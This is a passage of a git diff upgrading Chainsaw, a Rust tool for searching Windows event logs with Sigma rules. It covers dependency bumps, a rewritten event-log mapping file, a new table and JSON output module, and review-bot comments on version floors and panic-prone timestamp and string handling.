"1f26faba0c3959972377d3b2d306ee9f71faee9714294e41bb777f83f88578be" dependencies = [ "proc-macro2", "quote", 
@@ -1199,23 +1046,23 @@ dependencies = [ [[package]] name = "serde_json" -version = "1.0.67" +version = "1.0.81" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a7f9e390c27c3c0ce8bc5d725f6e4d30a29d26659494aa4b17535f7522c5c950" +checksum = "9b7ce2b32a1aed03c558dc61a5cd328f15aff2dbc17daad8fb8af04d2100e15c" dependencies = [ - "itoa", + "itoa 1.0.2", "ryu", "serde", ] [[package]] name = "serde_yaml" -version = "0.8.20" +version = "0.8.24" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ad104641f3c958dab30eb3010e834c2622d1f3f4c530fef1dee20ad9485f3c09" +checksum = "707d15895415db6628332b737c838b88c598522e4dc70647e59b72312924aebc" dependencies = [ - "dtoa", "indexmap", + "ryu", "serde", "yaml-rust", ] @@ -1253,9 +1100,9 @@ dependencies = [ [[package]] name = "skeptic" -version = "0.13.6" +version = "0.13.7" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "188b810342d98f23f0bb875045299f34187b559370b041eb11520c905370a888" +checksum = "16d23b015676c90a0f01c197bfdc786c20342c73a0afdda9025adb0bc42940a8" dependencies = [ "bytecount", "cargo_metadata", @@ -1268,9 +1115,9 @@ dependencies = [ [[package]] name = "smallvec" -version = "1.6.1" +version = "1.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fe0f37c9e8f3c5a4a66ad655a93c74daac4ad00c441533bf5c6e7990bb42604e" +checksum = "f2dd574626839106c320a323308629dcb1acfc96e32a8cba364ddc61ac23ee83" [[package]] name = "strsim" @@ -1280,9 +1127,9 @@ checksum = "8ea5119cdb4c55b55d432abb513a0429384878c15dde60cc77b1c99de1a95a6a" [[package]] name = "structopt" -version = "0.3.23" +version = "0.3.26" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bf9d950ef167e25e0bdb073cf1d68e9ad2795ac826f2f3f59647817cf23c0bfa" +checksum = "0c6b5c64445ba8094a6ab0c3cd2ad323e07171012d9c98b0b15651daf1787a10" dependencies = [ "clap", "lazy_static", 
@@ -1291,9 +1138,9 @@ dependencies = [ [[package]] name = "structopt-derive" -version = "0.4.16" +version = "0.4.18" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "134d838a2c9943ac3125cf6df165eda53493451b719f3255b2a26b85f772d0ba" +checksum = "dcb5ae327f9cc13b68763b5749770cb9e048a99bd9dfdfa58d0cf05d5f64afe0" dependencies = [ "heck", "proc-macro-error", @@ -1304,35 +1151,24 @@ dependencies = [ [[package]] name = "syn" -version = "1.0.76" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c6f107db402c2c2055242dbf4d2af0e69197202e9faacbef9571bbe47f5a1b84" -dependencies = [ - "proc-macro2", - "quote", - "unicode-xid", -] - -[[package]] -name = "synstructure" -version = "0.12.5" +version = "1.0.95" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "474aaa926faa1603c40b7885a9eaea29b444d1cb2850cb7c0e37bb1a4182f4fa" +checksum = "fbaf6116ab8924f39d52792136fb74fd60a80194cf1b1c6ffa6453eef1c3f942" dependencies = [ "proc-macro2", "quote", - "syn", - "unicode-xid", + "unicode-ident", ] [[package]] name = "tau-engine" -version = "1.0.2" +version = "1.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "03d4076a31ff10d9f07ff47a897ba1886eadeb85e89e4f7310c34d090e10a86d" +checksum = "e01789704e01baf9d6b0e677648e6bf52b7ba7192c9201dd426f02ab6d493f9f" dependencies = [ - "aho-corasick", - "regex", + "aho-corasick 0.7.18", + "lazy_static", + "regex 1.5.6", "serde", "serde_json", "serde_yaml", @@ -1341,14 +1177,14 @@ dependencies = [ [[package]] name = "tempfile" -version = "3.2.0" +version = "3.3.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "dac1c663cfc93810f88aed9b8941d48cabf856a1b111c29a40439018d870eb22" +checksum = "5cdb1ef4eaeeaddc8fbd371e5017057064af0911902ef36b39801f67cc6d79e4" dependencies = [ "cfg-if", + "fastrand", "libc", - "rand", - "redox_syscall 0.2.10", + "redox_syscall 0.2.13", "remove_dir_all", "winapi", ] 
@@ -1366,9 +1202,9 @@ dependencies = [ [[package]] name = "termcolor" -version = "1.1.2" +version = "1.1.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2dfed899f0eb03f32ee8c6a0aabdb8a7949659e3466561fc0adf54e26d88c5f4" +checksum = "bab24d30b911b2376f3a13cc2cd443142f0c81dda04c118693e35b3835757755" dependencies = [ "winapi-util", ] 
@@ -1394,39 +1230,49 @@ dependencies = [ [[package]] name = "thiserror" -version = "1.0.29" +version = "1.0.31" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "602eca064b2d83369e2b2f34b09c70b605402801927c65c11071ac911d299b88" +checksum = "bd829fe32373d27f76265620b5309d0340cb8550f523c1dda251d6298069069a" dependencies = [ "thiserror-impl", ] [[package]] name = "thiserror-impl" -version = "1.0.29" +version = "1.0.31" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bad553cc2c78e8de258400763a647e80e6d1b31ee237275d756f6836d204494c" +checksum = "0396bc89e626244658bef819e22d0cc459e795a5ebe878e6ec336d1674a8d79a" dependencies = [ "proc-macro2", "quote", "syn", ] +[[package]] +name = "thread_local" +version = "0.3.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c6b53e329000edc2b34dbe8545fd20e55a333362d0a321909685a19bd28c3f1b" +dependencies = [ + "lazy_static", +] + [[package]] name = "time" -version = "0.1.43" +version = "0.1.44" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ca8a50ef2360fbd1eeb0ecd46795a87a19024eb4b53c5dc916ca1fd95fe62438" +checksum = "6db9e6914ab8b1ae1c260a4ae7a49b6c5611b40328a735b21862567685e73255" dependencies = [ "libc", + "wasi 0.10.0+wasi-snapshot-preview1", "winapi", ] [[package]] name = "tracing" -version = "0.1.26" +version = "0.1.34" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "09adeb8c97449311ccd28a427f96fb563e7fd31aabf994189879d9da2394b89d" +checksum = "5d0ecdcb44a79f0fe9844f0c4f33a342cbcbb5117de8001e6ba0dc2351327d09" dependencies = [ "cfg-if", "pin-project-lite", 
@@ -1436,9 +1282,9 @@ dependencies = [ [[package]] name = "tracing-attributes" -version = "0.1.15" +version = "0.1.21" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c42e6fa53307c8a17e4ccd4dc81cf5ec38db9209f59b222210375b54ee40d1e2" +checksum = "cc6b8ad3567499f98a1db7a752b07a7c8c7c7c34c332ec00effb2b0027974b7c" dependencies = [ "proc-macro2", "quote", @@ -1447,18 +1293,18 @@ dependencies = [ [[package]] name = "tracing-core" -version = "0.1.19" +version = "0.1.26" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2ca517f43f0fb96e0c3072ed5c275fe5eece87e8cb52f4a77b69226d3b1c9df8" +checksum = "f54c8ca710e81886d498c2fd3331b56c93aa248d49de2222ad2742247c60072f" dependencies = [ "lazy_static", ] [[package]] -name = "ucd-trie" -version = "0.1.3" +name = "ucd-util" +version = "0.1.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "56dee185309b50d1f11bfedef0fe6d036842e3fb77413abef29f8f8d1c5d4c1c" +checksum = "c85f514e095d348c279b1e5cd76795082cf15bd59b93207832abe0b1d8fed236" [[package]] name = "unicase" 
@@ -1470,28 +1316,28 @@ dependencies = [ ] [[package]] -name = "unicode-segmentation" -version = "1.8.0" +name = "unicode-ident" +version = "1.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8895849a949e7845e06bd6dc1aa51731a103c42707010a5b591c0038fb73385b" +checksum = "d22af068fba1eb5edcb4aea19d382b2a3deb4c8f9d475c589b6ada9e0fd493ee" [[package]] -name = "unicode-width" -version = "0.1.8" +name = "unicode-segmentation" +version = "1.9.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9337591893a19b88d8d87f2cec1e73fad5cdfd10e5a6f349f498ad6ea2ffb1e3" +checksum = "7e8820f5d777f6224dc4be3632222971ac30164d4a258d595640799554ebfd99" [[package]] -name = "unicode-xid" -version = "0.2.2" +name = "unicode-width" +version = "0.1.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8ccb82d61f80a663efe1f787a51b16b5a51e3314d6ac365b08639f52387b33f3" +checksum = "3ed742d4ea2bd1176e236172c8429aaf54486e7ac098db29ffe6529e0ce50973" [[package]] -name = "unindent" -version = "0.1.7" +name = "utf8-ranges" +version = "1.0.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f14ee04d9415b52b3aeab06258a3f07093182b88ba0f9b8d203f211a7a7d41c7" +checksum = "7fcfc827f90e53a02eaef5e535ee14266c1d569214c6aa70133a624d8a3164ba" [[package]] name = "vec_map" @@ -1501,9 +1347,9 @@ checksum = "f1bddf1187be692e79c5ffeab891132dfb0f236ed36a43c7ed39f1165ee20191" [[package]] name = "version_check" -version = "0.9.3" +version = "0.9.4" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5fecdca9a5291cc2b8dcf7dc02453fee791a280f3743cb0905f8822ae463b3fe" +checksum = "49874b5167b65d7193b8aba1567f5c7d93d001cafc34600cee003eda787e483f" [[package]] name = "walkdir" 
@@ -1524,9 +1370,9 @@ checksum = "cccddf32554fecc6acb585f82a32a72e28b48f8c4c1883ddfeeeaa96f7d8e519" [[package]] name = "wasi" -version = "0.10.2+wasi-snapshot-preview1" +version = "0.10.0+wasi-snapshot-preview1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fd6fbd9a79829dd1ad0cc20627bf1ed606756a7f77edff7b66b7064f9cb327c6" +checksum = "1a143597ca7c7793eff794def352d41792a93c481eb1042423ff7ff72ba2c31f" [[package]] name = "winapi" @@ -1568,7 +1414,7 @@ dependencies = [ "bitflags", "byteorder", "chrono", - "env_logger 0.7.1", + "env_logger", "log", "num-derive", "num-traits", @@ -1588,6 +1434,6 @@ dependencies = [ [[package]] name = "zeroize" -version = "1.4.1" +version = "1.5.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "377db0846015f7ae377174787dd452e1c5f5a9050bc6f954911d01f116daa0cd" +checksum = "94693807d016b2f2d2e14420eb3bfcca689311ff775dcf113d74ea624b7cdf07" diff --git a/Cargo.toml b/Cargo.toml index 1f23247b..5fdc826b 100644 --- a/Cargo.toml +++ b/Cargo.toml 
@@ -1,38 +1,30 @@ [package] name = "chainsaw" -version = "1.1.7" +version = "2.0.0-alpha.0" repository = "https://github.com/countercept/chainsaw" description = "Rapidly Search and Hunt Through Windows Event Logs" authors = ["James Dorgan ","Alex Kornitzer "] readme = "README.md" license = "GPL3" -edition = "2018" +edition = "2021" [dependencies] -ajson = "0.2" +aho-corasick = "0.7" anyhow = "1.0" chrono = "0.4" +chrono-tz = { version = "0.4", features = ["serde"] } colour = "0.6" -csv = "1.1" -env_logger = "0.6" evtx = "0.7" -failure = "0.1" -glob = "0.3" indicatif = "0.16" -is_elevated = "0.1.2" -itertools = "0.10" -log = "0.4" -prettytable-rs = "0.7" +prettytable-rs = "0.8" rayon = "1.5" -regex = "1.4" -serde = { version = "=1.0.117", features = ["derive"]} -serde_derive = "1.0" +regex = "1.5" +serde = { version = "1.0", features = ["derive"] } serde_json = "1.0" serde_yaml = "0.8" structopt = "0.3" -tau-engine = { version = "1.0", features = ["json"] } -walkdir = "2.3" +tau-engine = { version = "1.0", features = ["core", "json"] } [dev-dependencies] diff --git a/evtx_attack_samples b/evtx_attack_samples deleted file mode 160000 index b947ed80..00000000 --- a/evtx_attack_samples +++ /dev/null @@ -1 +0,0 @@ -Subproject commit b947ed80cd67a7413f6689d032eb1151f85f9df6 diff --git a/mapping_files/sigma-mapping.yml b/mapping_files/sigma-mapping.yml deleted file mode 100644 index 1ff7b100..00000000 --- a/mapping_files/sigma-mapping.yml +++ /dev/null 
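Review bot: `tau-engine = { version = "1.0", features = ["core", "json"] }` declares a 1.0 floor while the lock resolves 1.4.0 and the new `src/ext/tau.rs` builds on `tau_engine::core::parser` behind the `core` feature; if those items postdate 1.0 (worth confirming against the crate's changelog), any resolution that picks an older 1.x fails to compile, so state the real minimum, e.g. `tau-engine = { version = "1.4", features = ["core", "json"] }`. The lock also now carries two `regex` and two `aho-corasick` versions (the `regex 1.5.6` / `aho-corasick 0.7.18` entries under tau-engine), which doubles the review and advisory surface for those crates; `cargo tree -d` shows which dependency pulls in the other copy, and a single version is usually reachable by bumping that one.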
@@ -1,110 +0,0 @@ -# Supported values are Stalker and Sigma -kind: sigma -# Exclude noisy rules, add the "title" of the Sigma rule here to exclude (or just delete the rule...) -exclusions: - - "Wuauclt Network Connection" - - "Exports Registry Key To an Alternate Data Stream" - - "NetNTLM Downgrade Attack" - - "Non Interactive PowerShell" - - "Defense evasion via process reimaging" -# EventID and SystemTime are automatically added to the mapping schema and show in the table output -mappings: - 1: - title: "Suspicious Process Creation" - provider: "Microsoft-Windows-Sysmon" - search_fields: - Image: "Event.EventData.Image" - CommandLine: "Event.EventData.CommandLine" - ParentImage: "Event.EventData.ParentImage" - ParentCommandLine: "Event.EventData.ParentCommandLine" - OriginalFileName: "Event.EventData.OriginalFileName" - table_headers: - context_field: "Event.EventData.Image" - command_line: "Event.EventData.CommandLine" - - # Can cause noise, enabled as needed - # 3: - # title: "Suspicious Network Connection" - # provider: "Microsoft-Windows-Sysmon" - # search_fields: - # Image: "Event.EventData.Image" - # DestinationIp: "Event.EventData.DestinationIp" - # DestinationHostname: "Event.EventData.DestinationHostname" - # DestinationPort: "Event.EventData.DestinationPort" - # DestinationIsIpv6: "Event.EventData.DestinationIsIpv6" - # User: "Event.EventData.User" - # Initiated: "Event.EventData.Initiated" - # SourcePort: "Event.EventData.SourcePort" - # table_headers: - # context_field: "Event.EventData.Image" - # destination_ip: "Event.EventData.DestinationIp" - # destination_port: "Event.EventData.DestinationPort" - - 7: - title: "Suspicious Image Load" - provider: "Microsoft-Windows-Sysmon" - search_fields: - Image: "Event.EventData.Image" - ImageLoaded: "Event.EventData.ImageLoaded" - table_headers: - context_field: "Event.EventData.Image" - image_loaded: "Event.EventData.ImageLoaded" - - 11: - title: "Suspicious File Creation" - provider: 
"Microsoft-Windows-Sysmon" - search_fields: - Image: "Event.EventData.Image" - TargetFilename: "Event.EventData.TargetFilename" - table_headers: - context_field: "Event.EventData.TargetFilename" - image: "Event.EventData.Image" - - 13: - title: "Suspicious Registry Event" - provider: "Microsoft-Windows-Sysmon" - search_fields: - Image: "Event.EventData.Image" - TargetObject: "Event.EventData.TargetObject" - Details: "Event.EventData.Details" - table_headers: - context_field: "Event.EventData.Details" - target_object: "Event.EventData.TargetObject" - - 7045: - title: "Suspicious Service Installed" - provider: "Service Control Manager" - search_fields: - CommandLine: "Event.EventData.ImagePath" - ServiceName: "Event.EventData.ServiceName" - table_headers: - context_field: "Event.EventData.ImagePath" - service_name: "Event.EventData.ServiceName" - - 4688: - title: "Suspicious Command Line" - provider: "Microsoft-Windows-Security-Auditing" - search_fields: - CommandLine: "Event.EventData.CommandLine" - UserName: "Event.EventData.SubjectUserName" - Image: "Event.EventData.NewProcessName" - table_headers: - context_field: "Event.EventData.CommandLine" - process_name: "Event.EventData.NewProcessName" - - 4104: - title: "Suspicious Powershell ScriptBlock" - provider: "Microsoft-Windows-PowerShell" - search_fields: - ScriptBlockText: "Event.EventData.ScriptBlockText" - table_headers: - context_field: "Event.EventData.ScriptBlockText" - - 4698: - title: "Suspicious Scheduled Task Created" - provider: "Microsoft-Windows-Security-Auditing" - search_fields: - CommandLine: "Event.EventData.TaskContent" - table_headers: - context_field: "Event.EventData.TaskContent" - username: "Event.EventData.SubjectUserName" diff --git a/mappings/sigma-event-logs.yml b/mappings/sigma-event-logs.yml new file mode 100644 index 00000000..a33db3b4 --- /dev/null +++ b/mappings/sigma-event-logs.yml 
@@ -0,0 +1,166 @@ +--- +name: Chainsaw's Sigma mappings for Event Logs +kind: evtx +rules: sigma + +ignore: + - Defense evasion via process reimaging + - Exports Registry Key To an Alternate Data Stream + - NetNTLM Downgrade Attack + - Non Interactive PowerShell + - Wuauclt Network Connection + +groups: + - name: Suspicious Process Creation + timestamp: Event.System.TimeCreated + filter: + - Event.System.EventID: 1 + Event.System.Provider: Microsoft-Windows-Sysmon + fields: + CommandLine: Event.EventData.CommandLine + Computer: Event.System.Computer + EventID: Event.System.EventID + Image: Event.EventData.Image + OriginalFileName: Event.EventData.OriginalFileName + ParentCommandLine: Event.EventData.ParentCommandLine + ParentImage: Event.EventData.ParentImage + default: + - EventID + - Computer + - Image + - CommandLine + + - name: Suspicious Network Connection + timestamp: Event.System.TimeCreated + filter: + - Event.System.EventID: 3 + Event.System.Provider: Microsoft-Windows-Sysmon + fields: + Computer: Event.System.Computer + DestinationIp: Event.EventData.DestinationIp + DestinationHostname: Event.EventData.DestinationHostname + DestinationPort: Event.EventData.DestinationPort + DestinationIsIpv6: Event.EventData.DestinationIsIpv6 + EventID: Event.System.EventID + Image: Event.EventData.Image + Initiated: Event.EventData.Initiated + SourcePort: Event.EventData.SourcePort + User: Event.EventData.User + default: + - EventID + - Computer + - Image + - DestinationIp + - DestinationPort + + - name: Suspicious Image Load + timestamp: Event.System.TimeCreated + filter: + - Event.System.EventID: 7 + Event.System.Provider: Microsoft-Windows-Sysmon + fields: + Computer: Event.System.Computer + EventID: Event.System.EventID + Image: Event.EventData.Image + ImageLoaded: Event.EventData.ImageLoaded + default: + - EventID + - Computer + - Image + - ImageLoaded + + - name: Suspicious File Creation + timestamp: Event.System.TimeCreated + filter: + - Event.System.EventID: 11 + 
Event.System.Provider: Microsoft-Windows-Sysmon + fields: + Computer: Event.System.Computer + EventID: Event.System.EventID + Image: Event.EventData.Image + TargetFilename: Event.EventData.TargetFilename + default: + - EventID + - Computer + - TargetFilename + - Image + + - name: Suspicious Registry Event + timestamp: Event.System.TimeCreated + filter: + - Event.System.EventID: 13 + Event.System.Provider: Microsoft-Windows-Sysmon + fields: + Computer: Event.System.Computer + Details: Event.EventData.Details + EventID: Event.System.EventID + Image: Event.EventData.Image + TargetObject: Event.EventData.TargetObject + default: + - EventID + - Computer + - Details + - TargetObject + + - name: Suspicious Service Installed + timestamp: Event.System.TimeCreated + filter: + - Event.System.EventID: 7045 + Event.System.Provider: Service Control Manager + fields: + CommandLine: Event.EventData.ImagePath + Computer: Event.System.Computer + EventID: Event.System.EventID + ServiceName: Event.EventData.ServiceName + default: + - EventID + - Computer + - CommandLine + - ServiceName + + - name: Suspicious Command Line + timestamp: Event.System.TimeCreated + filter: + - Event.System.EventID: 4688 + Event.System.Provider: Microsoft-Windows-Security-Auditing + fields: + CommandLine: Event.EventData.CommandLine + Computer: Event.System.Computer + EventID: Event.System.EventID + Image: Event.EventData.NewProcessName + UserName: Event.EventData.SubjectUserName + default: + - EventID + - Computer + - CommandLine + - Image + + - name: Suspicious Powershell ScriptBlock + timestamp: Event.System.TimeCreated + filter: + - Event.System.EventID: 4104 + Event.System.Provider: Microsoft-Windows-PowerShell + fields: + Computer: Event.System.Computer + EventID: Event.System.EventID + ScriptBlockText: Event.EventData.ScriptBlockText + default: + - EventID + - Computer + - ScriptBlockText + + - name: Suspicious Scheduled Task Created + timestamp: Event.System.TimeCreated + filter: + - 
Event.System.EventID: 4698 + Event.System.Provider: Microsoft-Windows-Security-Auditing + fields: + CommandLine: Event.EventData.TaskContent + Computer: Event.System.Computer + EventID: Event.System.EventID + UserName: Event.EventData.SubjectUserName + default: + - EventID + - Computer + - CommandLine + - UserName diff --git a/sigma_rules b/sigma_rules deleted file mode 160000 index 5b72cdb3..00000000 --- a/sigma_rules +++ /dev/null @@ -1 +0,0 @@ -Subproject commit 5b72cdb3c2df8ccb82e5bdd5e995f38ff8d6acad diff --git a/src/check.rs b/src/check.rs deleted file mode 100644 index 5bf841a6..00000000 --- a/src/check.rs +++ /dev/null @@ -1,36 +0,0 @@ -use crate::hunt::{get_mapping_file, load_detection_rules, RuleType}; -use anyhow::Result; -use std::path::PathBuf; -use structopt::StructOpt; - -#[derive(StructOpt)] -pub struct CheckOpts { - /// Specify a directory containing detection rules to use. All files matching *.yml will be used. - rules_path: PathBuf, - - /// Specify the mapping file to use to with the specified detection rules. - /// Required when using the --rule/-r flag - #[structopt(short = "m", long = "mapping")] - pub mapping_path: PathBuf, - - /// Print verbose - #[structopt(short = "v", long = "verbose")] - pub verbose: bool, -} - -pub fn run_check(opt: CheckOpts) -> Result { - let mapping_file = get_mapping_file(&opt.mapping_path)?; - match RuleType::from(&mapping_file.kind) { - Some(RuleType::Sigma) => {} - Some(RuleType::Stalker) => {} - None => { - return Err(anyhow!( - "Unsupported rule kind: {} - supported values are 'sigma' or 'stalker'", - mapping_file.kind - )) - } - } - cs_eprintln!("[+] Validating supplied detection rules...\n\r"); - load_detection_rules(&opt.rules_path, true, &mapping_file, opt.verbose)?; - Ok("".to_string()) -} diff --git a/src/cli.rs b/src/cli.rs new file mode 100644 index 00000000..1315bd49 --- /dev/null +++ b/src/cli.rs 
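Review bot: The `Suspicious Network Connection` group (Sysmon EventID 3) is now active, whereas the mapping file this replaces kept it commented out as a noise source, and nothing in the new file records that trade-off. A one-line comment above the group, `# High-volume on busy hosts; drop this group or add the noisy rule titles to ignore if output is swamped`, would preserve the intent for whoever tunes the mapping next. The `ignore` entries also appear to be matched by rule tag/title, so they silently stop working when an upstream Sigma rule is renamed; a comment above `ignore` saying so, `# Matched on rule title - re-check after updating the Sigma rule set`, is cheap insurance.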
@@ -0,0 +1,266 @@ +use std::collections::HashMap; + +use chrono::{DateTime, NaiveDateTime, TimeZone, Utc}; +use chrono_tz::Tz; +use indicatif::{ProgressBar, ProgressDrawTarget, ProgressStyle}; +use prettytable::{cell, format, Row, Table}; +use tau_engine::Document; + +use crate::hunt::{Detection, Detections, Kind, Mapping}; +use crate::rule::Rule; + +#[cfg(not(windows))] +pub const RULE_PREFIX: &str = "‣"; + +#[cfg(windows)] +pub const RULE_PREFIX: &str = "+"; + +#[cfg(not(windows))] +const TICK_SETTINGS: (&str, u64) = ("⠋⠙⠹⠸⠼⠴⠦⠧⠇⠏ ", 80); + +#[cfg(windows)] +const TICK_SETTINGS: (&str, u64) = (r"-\|/-", 200); + +pub fn init_progress_bar(size: u64, msg: String) -> indicatif::ProgressBar { + let pb = ProgressBar::new(size); + unsafe { + match crate::write::WRITER.quiet { + true => pb.set_draw_target(ProgressDrawTarget::hidden()), + false => pb.set_draw_target(ProgressDrawTarget::stderr()), + } + }; + pb.set_style( + ProgressStyle::default_bar() + .template("[+] {msg}: [{bar:40}] {pos}/{len} {spinner}") + .tick_chars(TICK_SETTINGS.0) + .progress_chars("=>-"), + ); + + pb.set_message(msg); + pb.enable_steady_tick(TICK_SETTINGS.1); + pb +} + +pub fn format_field_length(data: &str, full_output: bool, length: u32) -> String { + // Take the context_field and format it for printing. Remove newlines, break into even chunks etc. 
+ // If this is a scheduled task we need to parse the XML to make it more readable + let mut data = data + .replace("\n", "") + .replace("\r", "") + .replace("\t", "") + .replace(" ", " ") + .chars() + .collect::>() + .chunks(length as usize) + .map(|c| c.iter().collect::()) + .collect::>() + .join("\n"); + + let truncate_len = 1000; + + if !full_output && data.len() > truncate_len { + data.truncate(truncate_len); + data.push_str("...\n\n(use --full to show all content)"); + } + + data +} + +pub fn print_detections( + detections: &[Detections], + mappings: &[Mapping], + rules: &[Rule], + column_width: u32, + full: bool, + local: bool, + metadata: bool, + timezone: Option, +) { + let format = format::FormatBuilder::new() + .column_separator('│') + .borders('│') + .separators( + &[format::LinePosition::Top], + format::LineSeparator::new('─', '┬', '┌', '┐'), + ) + .separators( + &[format::LinePosition::Intern], + format::LineSeparator::new('─', '┼', '├', '┤'), + ) + .separators( + &[format::LinePosition::Bottom], + format::LineSeparator::new('─', '┴', '└', '┘'), + ) + .padding(1, 1) + .build(); + + let mappings: HashMap<_, HashMap<_, _>> = mappings + .iter() + .map(|m| (&m.name, m.groups.iter().map(|g| (&g.name, g)).collect())) + .collect(); + let rules: HashMap<_, _> = rules.iter().map(|r| (&r.tag, r)).collect(); + + // Do a signle unfold... 
+ let mut grouped: HashMap< + (&Option, &String), + Vec<(&NaiveDateTime, &Kind, Vec<&String>)>, + > = HashMap::new(); + for detection in detections { + let mut tags: HashMap<(&Option, &String), (&NaiveDateTime, Vec<&String>)> = + HashMap::new(); + for hit in &detection.hits { + let tags = tags + .entry((&hit.mapping, &hit.group)) + .or_insert((&hit.timestamp, vec![])); + (*tags).1.push(&hit.tag); + } + for (k, v) in tags { + let grouped = grouped.entry(k).or_insert(vec![]); + (*grouped).push((&v.0, &detection.kind, v.1)); + } + } + + let mut keys = grouped.keys().cloned().collect::>(); + keys.sort(); + for key in keys { + let mut grouped = grouped.remove(&key).expect("could not get grouped!"); + grouped.sort_by(|x, y| x.0.cmp(&y.0)); + let mut table = Table::new(); + table.set_format(format); + let (mapping, group) = key; + if let Some(mapping) = mapping { + if let Some(groups) = mappings.get(mapping) { + let group = groups.get(&group).expect("could not get group!"); + let mut header = vec![ + cell!("timestamp").style_spec("c"), + cell!("detections").style_spec("c"), + ]; + if let Some(default) = group.default.as_ref() { + for field in default { + header.push(cell!(field).style_spec("c")); + } + } else { + header.push(cell!("data").style_spec("c")); + } + table.add_row(Row::new(header)); + for (timestamp, kind, mut tags) in grouped { + tags.sort(); + let localised = if let Some(timezone) = timezone { + timezone + .from_local_datetime(timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else if local { + Utc.from_local_datetime(timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else { + DateTime::::from_utc(timestamp.clone(), Utc).to_rfc3339() + }; + let mut cells = vec![cell!(localised)]; + if metadata { + let mut table = Table::new(); + table.add_row(Row::new(vec![ + cell!("name").style_spec("c"), + cell!("authors").style_spec("c"), + cell!("level").style_spec("c"), + 
cell!("status").style_spec("c"), + ])); + for tag in tags { + let rule = rules.get(&tag).expect("could not get rule"); + table.add_row(Row::new(vec![ + cell!(tag), + cell!(rule.authors.join("\n")), + cell!(rule.level), + cell!(rule.status), + ])); + } + cells.push(cell!(table)); + } else { + cells.push(cell!(tags + .iter() + .map(|tag| format!("{} {}", RULE_PREFIX, tag.as_str())) + .collect::>() + .join("\n"))); + } + let document = match kind { + Kind::Individual { document } => document, + _ => continue, + }; + if let Some(default) = group.default.as_ref() { + for field in default { + if let Some(value) = group + .fields + .get(field) + .and_then(|k| document.data.find(k)) + .and_then(|v| v.to_string()) + { + cells.push(cell!(format_field_length(&value, full, column_width))); + } else { + cells.push(cell!("")); + } + } + } else { + let json = serde_json::to_string(&document.data) + .expect("could not serialise document"); + cells.push(cell!(format_field_length(&json, false, column_width))); + } + table.add_row(Row::new(cells)); + } + } + } + cs_greenln!("\n[+] Group: {}", key.1); + cs_print_table!(table); + } +} + +pub fn print_json( + detections: &[Detections], + rules: &[Rule], + local: bool, + timezone: Option, +) -> crate::Result<()> { + // TODO: Fixme... 
+ let ruleset = "sigma".to_owned(); + let rules: HashMap<_, _> = rules.iter().map(|r| (&r.tag, r)).collect(); + let mut detections = detections + .iter() + .map(|d| { + let mut detections = Vec::with_capacity(d.hits.len()); + for hit in &d.hits { + let rule = rules.get(&hit.tag).expect("could not get rule!"); + let localised = if let Some(timezone) = timezone { + timezone + .from_local_datetime(&hit.timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else if local { + Utc.from_local_datetime(&hit.timestamp) + .single() + .expect("failed to localise timestamp") + .to_rfc3339() + } else { + DateTime::::from_utc(hit.timestamp.clone(), Utc).to_rfc3339() + }; + detections.push(Detection { + authors: &rule.authors, + group: &hit.group, + kind: &d.kind, + level: &rule.level, + name: &hit.tag, + source: &ruleset, + status: &rule.status, + timestamp: localised, + }) + } + detections + }) + .flatten() + .collect::>(); + detections.sort_by(|x, y| x.timestamp.cmp(&y.timestamp)); + cs_print_json!(&detections)?; + Ok(()) +} diff --git a/src/convert/mod.rs b/src/convert/mod.rs deleted file mode 100644 index 6d68cdbe..00000000 --- a/src/convert/mod.rs +++ /dev/null @@ -1,2 +0,0 @@ -pub mod sigma; -pub mod stalker; diff --git a/src/convert/stalker.rs b/src/convert/stalker.rs deleted file mode 100644 index 4a865b9f..00000000 --- a/src/convert/stalker.rs +++ /dev/null 
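Review bot: `.single().expect("failed to localise timestamp")` in the `timezone` branch of print_detections, and again in print_json, aborts the whole run on any event whose local time falls in a DST gap or overlap, because `Tz::from_local_datetime` returns `None` or `Ambiguous` there; one such record kills the report whenever a timezone is supplied. Resolve instead of panicking, e.g. `match timezone.from_local_datetime(timestamp).earliest() { Some(t) => t.to_rfc3339(), None => timestamp.to_string() }`. In format_field_length, `data.truncate(truncate_len)` panics when byte 1000 is not a char boundary, and `data.len()` counts bytes while the chunking just above counted chars, so non-ASCII event data (common in event logs) trips this; cut on a char boundary with `if let Some((i, _)) = data.char_indices().nth(truncate_len) { data.truncate(i); … }` in place of the byte-length check.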
